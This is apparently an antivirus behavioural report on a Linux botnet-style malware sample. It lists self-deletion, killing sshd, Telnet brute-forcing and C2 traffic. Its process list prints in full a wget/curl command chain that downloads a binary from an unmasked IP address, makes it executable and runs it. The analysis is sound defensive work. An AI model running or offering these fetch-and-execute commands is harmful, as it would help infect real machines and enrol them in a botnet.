Technical Information
Malicious functions:
Removes itself
Launches itself as a daemon
Substitutes application name for:
- geadooodoeddnddDALo
Launches processes:
- sh -c wget http://185.244.25.160/hahdshd73ahshds73/ugei1; chmod 777 *; ./ugei1 wget.x86; curl -O http://185.244.25.160/hahdshd73ahshds73/ugei1; chmod 777 *; ./ugei1 curl.x86;
- wget http://185.244.25.160/hahdshd73ahshds73/ugei1
- chmod 777 run.sh stdout.log ugei1
- ./ugei1 wget.x86
- chmod 777 run.sh stdout.log
- ./ugei1 curl.x86
Kills system processes:
- sshd
Kills the following processes:
- exim4
- bash
- run.sh
- /root/ugei1
Performs operations with the file system:
Modifies file access rights:
- /root/run.sh
- /root/ugei1
Creates or modifies files:
- /root/ugei1
Deletes files:
- /root/ugei1
Network activity:
Awaits incoming connections on ports:
- 127.0.0.1:17110
Establishes connection:
- 8.#.8.8:53
- 18#.##4.25.160:6574
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
- 18#.###.##.160/hahdshd73ahshds73/ugei1
Sends data to the following servers:
- 18#.##4.25.160:6574
Receives data from the following servers:
- 18#.##4.25.160:6574
